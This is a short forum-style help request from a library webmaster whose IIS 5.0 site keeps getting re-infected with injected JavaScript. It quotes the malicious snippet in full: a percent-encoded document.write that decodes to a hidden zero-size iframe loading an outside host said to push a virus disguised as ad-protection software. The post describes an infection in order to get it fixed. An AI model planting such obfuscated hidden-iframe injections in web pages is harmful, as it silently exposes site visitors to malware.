Malicious javascript: document.write (unescape

Some malicious javascript has been appearing on the website of the library I work at:

document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’));

this translates to:

iframe src=”http://mn96.dns.gendistr.info/qualitytest/” height=”0″ width=”0″

The website attempts to offer a virus disguised as ad protection software.  I can delete the code but it reappears (likely if/when the server is rebooted).  The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp.   Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.

We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.

P.S.:  To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.